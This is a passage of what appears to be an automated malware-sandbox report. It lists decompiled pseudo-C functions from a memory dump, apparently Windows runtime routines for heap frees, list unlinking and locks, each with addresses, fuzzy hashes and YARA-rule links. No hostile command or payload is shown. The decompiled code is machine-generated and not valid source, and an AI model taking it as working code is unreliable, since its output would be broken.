					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E011876E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L01194620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                                          0x011afd9b
                                                                          0x011afda0
                                                                          0x011afda1
                                                                          0x011afdab
                                                                          0x011afdad
                                                                          0x011afdb0
                                                                          0x011afdb8
                                                                          0x011afe0f
                                                                          0x011afde6
                                                                          0x011afde9
                                                                          0x011afdec
                                                                          0x011ec0c0
                                                                          0x011afdfe
                                                                          0x011afe06
                                                                          0x011afe06
                                                                          0x011ec0c8
                                                                          0x011afe2d
                                                                          0x011afe2d
                                                                          0x00000000
                                                                          0x011afe2d
                                                                          0x011ec0d1
                                                                          0x011ec0e0
                                                                          0x011ec0e5
                                                                          0x011ec0e5
                                                                          0x011ec0e8
                                                                          0x00000000
                                                                          0x011ec0e8
                                                                          0x011afdf4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011afdf6
                                                                          0x011afdfa
                                                                          0x011afe1a
                                                                          0x011afe1f
                                                                          0x011afe1f
                                                                          0x011afdfc
                                                                          0x00000000
                                                                          0x011afdfc
                                                                          0x011afdcc
                                                                          0x011afdd0
                                                                          0x011afe26
                                                                          0x00000000
                                                                          0x011afe26
                                                                          0x011afdd8
                                                                          0x011afddb
                                                                          0x011afddd
                                                                          0x011afde0
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                          • Instruction ID: c692ac972ded3ba4f94a249378543acdf5736102ba1b3d750bd565f9bc8641bc
                                                                          • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                          • Instruction Fuzzy Hash: 4421BE7A600A42DFDB3ACF4DC540E6AFBE5EB94B10F22807EEA5587611D7309C02CB80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011AB390, Relevance: .1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 54%
                                                                          			E011AB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E01192280(_t12, 0x1268608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E011B00C2(0x1268608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                                          0x011ab395
                                                                          0x011ab3a2
                                                                          0x011ab3a5
                                                                          0x011ab3aa
                                                                          0x011ab3b2
                                                                          0x011ab3ba
                                                                          0x011ab3bd
                                                                          0x011ab3c0
                                                                          0x011ab3c4
                                                                          0x011ab3c9
                                                                          0x011ea3e9
                                                                          0x011ea3ed
                                                                          0x011ea3f0
                                                                          0x011ea3ff
                                                                          0x011ea403
                                                                          0x011ea409
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011ea40b
                                                                          0x011ea40b
                                                                          0x011ea40f
                                                                          0x011ea415
                                                                          0x011ea423
                                                                          0x011ea423
                                                                          0x011ea415
                                                                          0x011ab3d1
                                                                          0x011ab3e8
                                                                          0x011ab3e8
                                                                          0x011ab3d9

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e0506f7d84b254c4563d858891b8dacf62ecec4d2d39924bf1e742b27fd0a401
                                                                          • Instruction ID: cd43d506d5f78bddaaa94a11c79dea40418406d63e262f17c85be72b978a0109
                                                                          • Opcode Fuzzy Hash: e0506f7d84b254c4563d858891b8dacf62ecec4d2d39924bf1e742b27fd0a401
                                                                          • Instruction Fuzzy Hash: 2A11AB373192109FCB2D8A599E80A2F779BEFC5330B294129EE16C73D0CB319C02C685
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01179240, Relevance: .1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 77%
                                                                          			E01179240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x124f708);
				E011CD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E011B95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E011B95D0();
				_t33 =  *0x12684c4; // 0x0
				L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x12684c4; // 0x0
				L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x12684c4; // 0x0
				E01192280(L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x12686b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E011B95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E011B95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E01179325();
					_t50 =  *0x12684c4; // 0x0
					return E011CD0D1(L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                                          0x01179240
                                                                          0x01179242
                                                                          0x01179247
                                                                          0x0117924c
                                                                          0x0117924e
                                                                          0x01179255
                                                                          0x01179257
                                                                          0x0117925a
                                                                          0x0117925f
                                                                          0x0117925f
                                                                          0x01179266
                                                                          0x01179271
                                                                          0x01179276
                                                                          0x01179279
                                                                          0x0117927e
                                                                          0x01179295
                                                                          0x0117929a
                                                                          0x011792b1
                                                                          0x011792b6
                                                                          0x011792d7
                                                                          0x011792dc
                                                                          0x011792e0
                                                                          0x011792e6
                                                                          0x011792e8
                                                                          0x011792ee
                                                                          0x01179332
                                                                          0x01179333
                                                                          0x01179337
                                                                          0x01179338
                                                                          0x0117933a
                                                                          0x0117933a
                                                                          0x0117933d
                                                                          0x01179342
                                                                          0x01179342
                                                                          0x01179345
                                                                          0x01179349
                                                                          0x0117934e
                                                                          0x01179352
                                                                          0x01179357
                                                                          0x011792f4
                                                                          0x011792f4
                                                                          0x011792f6
                                                                          0x011792f9
                                                                          0x01179300
                                                                          0x01179306
                                                                          0x01179324
                                                                          0x01179324

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 241ec507139d69b00ab867b78dfa0ad93ee3efa51141adf2d4d88390a55ce768
                                                                          • Instruction ID: 5b54342ca421f5f6fb2bfd7df42fa2c66cd167874cff9a841dc83076b6ad4bc5
                                                                          • Opcode Fuzzy Hash: 241ec507139d69b00ab867b78dfa0ad93ee3efa51141adf2d4d88390a55ce768
                                                                          • Instruction Fuzzy Hash: 21219831050A01DFCB2AEF28CA44F1AB7B9FF28718F00456DE109876A2CB34E941CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01204257, Relevance: .1, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 90%
                                                                          			E01204257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x12508d0);
				E011CD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E012041E8(__ebx, __edi, __ecx, _t39);
				E0118EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x12687e4;
					_t18 =  *0x12687e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x1265cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x12687e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x12687e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L01177055(_t31 + 0xfffffff8);
								_t24 =  *0x12687e0; // 0x0
								_t18 = _t24 - 1;
								 *0x12687e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x1265cd0;
				if( *0x1265cd0 <= 0) {
					L01177055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x12687e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x12687e8 = _t30;
						 *0x12687e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E011CD0D1(L01204320());
			}















                                                                          0x01204257
                                                                          0x01204257
                                                                          0x01204257
                                                                          0x01204259
                                                                          0x0120425e
                                                                          0x01204263
                                                                          0x01204265
                                                                          0x01204273
                                                                          0x01204278
                                                                          0x0120427c
                                                                          0x0120427f
                                                                          0x01204281
                                                                          0x01204287
                                                                          0x012042d7
                                                                          0x012042d7
                                                                          0x012042da
                                                                          0x0120428d
                                                                          0x0120428d
                                                                          0x0120428f
                                                                          0x01204292
                                                                          0x01204297
                                                                          0x0120429c
                                                                          0x012042a0
                                                                          0x012042a6
                                                                          0x012042a8
                                                                          0x012042ae
                                                                          0x012042b3
                                                                          0x00000000
                                                                          0x012042ba
                                                                          0x012042ba
                                                                          0x012042bf
                                                                          0x012042c5
                                                                          0x012042ca
                                                                          0x012042cf
                                                                          0x012042d0
                                                                          0x00000000
                                                                          0x012042d0
                                                                          0x012042b3
                                                                          0x00000000
                                                                          0x012042a6
                                                                          0x0120429c
                                                                          0x012042dc
                                                                          0x012042dc
                                                                          0x012042e3
                                                                          0x01204309
                                                                          0x012042e5
                                                                          0x012042e5
                                                                          0x012042e8
                                                                          0x012042ee
                                                                          0x012042f0
                                                                          0x00000000
                                                                          0x012042f2
                                                                          0x012042f2
                                                                          0x012042f4
                                                                          0x012042f7
                                                                          0x012042f9
                                                                          0x01204300
                                                                          0x01204300
                                                                          0x012042f0
                                                                          0x0120430e
                                                                          0x0120431f

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a75a9c6a398f9203542105b97329b957678f659b1d0691aaa87834517fe58530
                                                                          • Instruction ID: c8029f2a16c4d1e882f3c370ec8fd4554376fa1e19c8d75eaf8b017ab48d2aef
                                                                          • Opcode Fuzzy Hash: a75a9c6a398f9203542105b97329b957678f659b1d0691aaa87834517fe58530
                                                                          • Instruction Fuzzy Hash: 1D214975621742CFC72BEF68E008A14BBB1FB55354B20C36ED2058F2EADB359491CB80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011A2397, Relevance: .1, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 25%
                                                                          			E011A2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x126848c != 0) {
					L0119FAD0(0x1268610);
					if( *0x126848c == 0) {
						E0119FA00(0x1268610, _t19, _t27, 0x1268610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E011A2581(0x1268610, 0x11550a0, _t26, _t27, _t28);
						E0119FA00(0x1268610, 0x11550a0, _t27, 0x1268610);
					}
				} else {
					L1:
					_t11 =  *0x1268614; // 0x0
					if(_t11 == 0) {
						_t11 = E011B4886(0x1151088, 1, 0x1268614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E011A2581(0x1268610, (_t11 << 4) + 0x1155070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                                          0x011a23b0
                                                                          0x011a23b6
                                                                          0x011a2409
                                                                          0x011a2415
                                                                          0x011e5ae9
                                                                          0x00000000
                                                                          0x011a241b
                                                                          0x011a241b
                                                                          0x011a241d
                                                                          0x011a2427
                                                                          0x011a242e
                                                                          0x011a2430
                                                                          0x011a2430
                                                                          0x011a23b8
                                                                          0x011a23b8
                                                                          0x011a23b8
                                                                          0x011a23bf
                                                                          0x011a23fc
                                                                          0x011a23fc
                                                                          0x011a23c1
                                                                          0x011a23c3
                                                                          0x011a23d0
                                                                          0x011a23d8
                                                                          0x011a23d8
                                                                          0x011a23dc
                                                                          0x011a23de
                                                                          0x011a23e1
                                                                          0x011a23e1
                                                                          0x011a23ec

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 47bfbf675fb4d19135b854f9ebd06753c041ae3ad1ba2385e6e7dcb207413dab
                                                                          • Instruction ID: 160309ac6dd6b59aa5a9a04e49d2f4e4a9d6359a1464fe23a5fb6361194bb066
                                                                          • Opcode Fuzzy Hash: 47bfbf675fb4d19135b854f9ebd06753c041ae3ad1ba2385e6e7dcb207413dab
                                                                          • Instruction Fuzzy Hash: 4E116B71704301ABE73C962DAC84B25BFCDFF64614F44801AFA02E7190C7B4E8418754
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011F46A7, Relevance: .1, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 93%
                                                                          			E011F46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L01194620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E011BF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E011AD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L011977F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                                          0x011f46b7
                                                                          0x011f46ba
                                                                          0x011f46c5
                                                                          0x011f46c8
                                                                          0x011f46d0
                                                                          0x011f46d4
                                                                          0x011f46e6
                                                                          0x011f46e9
                                                                          0x011f46f4
                                                                          0x011f46ff
                                                                          0x011f4705
                                                                          0x011f4706
                                                                          0x011f470c
                                                                          0x011f4713
                                                                          0x011f471b
                                                                          0x011f4723
                                                                          0x011f4725
                                                                          0x011f46d6
                                                                          0x011f46d9
                                                                          0x011f46db
                                                                          0x011f46db
                                                                          0x011f4732

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                          • Instruction ID: 8b2b6549e97f8bf5465aa52d6305c6059f4222b536bef545884ace46b8a199ad
                                                                          • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                          • Instruction Fuzzy Hash: 7311E572504608BBCB199F5CD8808BEBBB9EF95314F10806EF944C7351DB318D55D7A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0117C962, Relevance: .1, Instructions: 57COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 42%
                                                                          			E0117C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x126d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0118EEF0(0x12670a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E011FF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0118EB70(_t29, 0x12670a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E011BB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E011FF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x12670c0; // 0x0
					while(_t38 != 0x12670c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x126b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                                          0x0117c96a
                                                                          0x0117c974
                                                                          0x0117c988
                                                                          0x0117c98a
                                                                          0x011e7c9d
                                                                          0x011e7c9f
                                                                          0x011e7ca4
                                                                          0x011e7cae
                                                                          0x011e7cf0
                                                                          0x011e7cf5
                                                                          0x011e7cfa
                                                                          0x0117c992
                                                                          0x0117c996
                                                                          0x0117c997
                                                                          0x0117c998
                                                                          0x0117c9a3
                                                                          0x0117c9a3
                                                                          0x011e7cb0
                                                                          0x011e7cb7
                                                                          0x011e7cbb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e7cbd
                                                                          0x011e7ce8
                                                                          0x011e7cc5
                                                                          0x011e7cc8
                                                                          0x011e7cca
                                                                          0x011e7cd0
                                                                          0x011e7cd6
                                                                          0x011e7cde
                                                                          0x011e7ce4
                                                                          0x011e7ce4
                                                                          0x011e7cd0
                                                                          0x00000000
                                                                          0x011e7ce8
                                                                          0x0117c990
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a861ec390f5a8e3d5d64503ed8adbeb3747ea23cf1f806eedfbc43312f0c3011
                                                                          • Instruction ID: f050a05335edb5e76a986d16dfb05c1d4e0eb6dc4f9ce80820c711693fb2e73b
                                                                          • Opcode Fuzzy Hash: a861ec390f5a8e3d5d64503ed8adbeb3747ea23cf1f806eedfbc43312f0c3011
                                                                          • Instruction Fuzzy Hash: A711E532314A079BD718AF6DEC89A6B77E9FB84618B000528F941836D1DF60EC65CBD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B37F5, Relevance: .1, Instructions: 57COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 87%
                                                                          			E011B37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E01192280(_t6, 0x1268550);
				}
				_t29 = E011B387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0118FFB0(0x1268550, _t27, 0x1268550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                                          0x011b37fa
                                                                          0x011b37fc
                                                                          0x011b3805
                                                                          0x011b3808
                                                                          0x011b3808
                                                                          0x011b3814
                                                                          0x011b3818
                                                                          0x011b3846
                                                                          0x011b3848
                                                                          0x011b384b
                                                                          0x011b384b
                                                                          0x011b3852
                                                                          0x00000000
                                                                          0x011b3854
                                                                          0x011b3856
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011b3863
                                                                          0x00000000
                                                                          0x011b3863
                                                                          0x011b381a
                                                                          0x011b381a
                                                                          0x011b381f
                                                                          0x011b386e
                                                                          0x011b386e
                                                                          0x011b3871
                                                                          0x011b3873
                                                                          0x011b3873
                                                                          0x011b3868
                                                                          0x00000000
                                                                          0x011b3868
                                                                          0x011b3821
                                                                          0x011b3826
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011b3828
                                                                          0x011b382a
                                                                          0x011b3841
                                                                          0x00000000
                                                                          0x011b3841

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 122e784332b652073ef733eb0cd977c1d83bb063515f27e7098e3e18d749f261
                                                                          • Instruction ID: aca80179075ffb463d980a01a0b58bd6fdd1775391da10a281a5d0703fc57de6
                                                                          • Opcode Fuzzy Hash: 122e784332b652073ef733eb0cd977c1d83bb063515f27e7098e3e18d749f261
                                                                          • Instruction Fuzzy Hash: 3A014972A116119BC33F8B1DD980E66BBE6FF85B50716416DF9258B315DB30C821C7C2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011A002D, Relevance: .1, Instructions: 55COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E011A002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E01197D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E01197D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E01197D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E01197D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                                          0x011a0032
                                                                          0x011a0037
                                                                          0x011a0043
                                                                          0x011e4b3a
                                                                          0x011a0049
                                                                          0x011a0049
                                                                          0x011a0049
                                                                          0x011a004e
                                                                          0x011a0053
                                                                          0x011e4b48
                                                                          0x011e4b5a
                                                                          0x011e4b4a
                                                                          0x011e4b53
                                                                          0x011e4b53
                                                                          0x011e4b5f
                                                                          0x00000000
                                                                          0x011e4b61
                                                                          0x00000000
                                                                          0x011e4b61
                                                                          0x011a0059
                                                                          0x011a0059
                                                                          0x011a0060
                                                                          0x011e4b6f
                                                                          0x011e4b6f
                                                                          0x011a0069
                                                                          0x011e4b83
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e4b90
                                                                          0x011e4b9b
                                                                          0x011e4b9b
                                                                          0x011e4ba4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e4baa
                                                                          0x00000000
                                                                          0x011a006f
                                                                          0x011a006f
                                                                          0x00000000
                                                                          0x011a006f
                                                                          0x011a0069

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                          • Instruction ID: 81d58a9720f1f0a26b3195b8672a3a9bfccba7f209fc3acf13b793b9365137d4
                                                                          • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                          • Instruction Fuzzy Hash: 0D110836201A818FEB2F87ACCA48B353BD5AF45794F1A00A0ED14C7E93E329D841C691
                                                                          Uniqueness

